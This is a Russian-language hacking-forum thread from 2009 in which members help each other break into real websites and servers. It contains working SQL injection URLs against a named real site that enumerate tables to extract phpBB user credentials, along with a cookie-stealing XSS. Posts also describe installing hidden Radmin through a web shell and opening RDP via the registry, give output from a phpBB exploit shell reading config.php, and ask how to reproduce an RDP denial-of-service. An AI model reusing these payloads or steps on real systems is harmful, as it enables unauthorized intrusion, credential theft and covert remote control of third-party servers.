Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. gLuk!

    gLuk! New Member

    Joined:
    27 Mar 2009
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    вобщем трабла...
    есть два путя)
    например
    http://exaple.com/gg/
    и
    http://exaple.com/forum/
    Вобщем нашел пассивную xss в каталоге gg. Выводит алерт с куками только в сафари и в ослике. в опере выводит пустой алерт... встречаюсь с этой шнягой первый раз. в чем проблема?
     
  2. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    А сам как думаеш? В браузере! :)
     
  3. gLuk!

    gLuk! New Member

    Joined:
    27 Mar 2009
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    можно ли какнить заставить работать в опере?
     
  4. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Подскажите плиз. во скуля http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),2,3,4,5-- так вот, там на сайте есть форум phpbb. я запустил скрипт kiborg'a на определение версии, он показал 3.0.4 Подскажите плиз, какие там таблицы с именами и пассами юзеров и колонки. Читал elekтовский пост,насчёт табиц phpbb_
    phpbb2_, но с ними не катит. http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),3,4,5+from+phpbb_--
     
  5. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    table users: phpbb3_users
    Колонки сам вырвешь/найдешь
     
  6. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,2,3,4,5+from+phpbb3_users--

    не катит (( Знающие помогите плиз.
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    там 5-я версиа БД тебе лень Сипт зАпустить и узнать какая там табелка и какие там таблички или тебе нравится надоедать вопросами на которые уже 100000 раз отвечали и простой поиск по форуму тебе даст на все ответ...

    Database Version: 5.0.45
    Database name: ege_site
    User name: site_view@localhost
     
    1 person likes this.
  8. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Не знаю что под словом "сипт" ты имеешь ввиду. Но information schema tables там не работает.
    add//Sory работает

    2. Я искал на форуме, но кроме парочки дефолтных таблиц и куча битых атачей ничего не нашол.
     
    #8008 nub-hacker, 13 Jul 2009
    Last edited: 13 Jul 2009
  9. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    SIPT Это прога для работа с SQL инекциями.
    а почему не работает information_schema?
    а это что?
    http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+18,1

    перебирайте лимитом и ищите нужную вам базу, потом нужную вам колонку.
    и читайте документацию больше, тут её очень и очень много
     
    2 people like this.
  10. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Бывает опытные админы составляют такие скрипти, например видел на одном хостинге, которые создавали пользователя и т.д, не помню на чем, .sh или пхп или перл, ето так для примера, суть не в етом. Ищешь, если достуны на запись, вставляешь свой код, а дальше по обдстановке что тебе нужно, например: чмоднуть или стянуть шедов:(
     
    #8010 The_HuliGun, 13 Jul 2009
    Last edited: 17 Jul 2009
  11. StarFire

    StarFire Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    118
    Likes Received:
    13
    Reputations:
    1
    имеется веб шелл на (windows server 2003/safe mode-off) имею права на чтение/запись но нет доступа к консоли (нет прав на исполнение) моя цель поднять radmin (hide сборка)
     
  12. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    По моему в с99shell да и в других шеллах права на консоль системные? То есть через шелл права полные?
     
  13. StarFire

    StarFire Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    118
    Likes Received:
    13
    Reputations:
    1
    имею права на папки (drwxrwxrwx) могу свободно перемещатся по дискам коих там 2 но консоль не воспринимает команды юзал (с99 и wso2 от Orb) никак не получается выполнить залитый radmin
     
  14. StarFire

    StarFire Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    118
    Likes Received:
    13
    Reputations:
    1
    по твоему правильно но тут по факту не так...
    ps уже заливал и поднимал radmin на виндах через шелл все было гладко а щас гдето камень...
     
    #8014 StarFire, 13 Jul 2009
    Last edited: 13 Jul 2009
  15. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    RDP сначало поставь. А потом уже радмин открывай. Через system() в реестре открываешь порт. Потом коннектишься через mstsc - инсталишь радмин.
     
  16. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    StarFire, а вот возьми другой шелл,к примеру р57, и посмотри - есть ли сейф-мод, а лучше - посмотри пхпинфо.
     
    1 person likes this.
  17. Isass

    Isass New Member

    Joined:
    13 Jul 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте господа! Хочу спросить у вас у хацкеров прожженных :) на днях просканил один сервак пауком версия 6.50 он мне выдал такую багу: порт 3389/tcp сервис RDP - Terminal Service Client состояние: <работает>
    найдена уязвимость DoS-атака (компьютер сейчас находится в стадии перезагрузки)

    Как мне локально реализовать ещё раз такую DoS-атака, может софт, какой есть, может самому как-то можно запрос сконфигурировать.
    Как ваще эта атка реализуется простой Dos на указанный порт или как. Зарания всем благодарин.
    p.s просьба не пинать ламера ушастого :cool:
     
  18. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Подскажите плиз. есть форум 2.0.15 phpbb. запустил эксплоит вот этот
    http://www.governmentsecurity.org/forum/index.php?showtopic=15383

    при запуске появилась вот:

    Code:
    /zero.pl http://site.com/viewtopic.php?t=9
    site.com - 80 - viewtopic.php?t=9
    Shell> ls -la
    Shell> cat config.php
    Shell>
    и на любую др. команду серв не отвечает. что может быть подскажите плиз. если надо вот
     
    #8018 nub-hacker, 14 Jul 2009
    Last edited: 17 Jul 2009
    1 person likes this.
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    пропатченный скорее всего
     
  20. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://www.google.ru/search?hl=ru&q=Ddos+bot&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=
     
Thread Status:
Not open for further replies.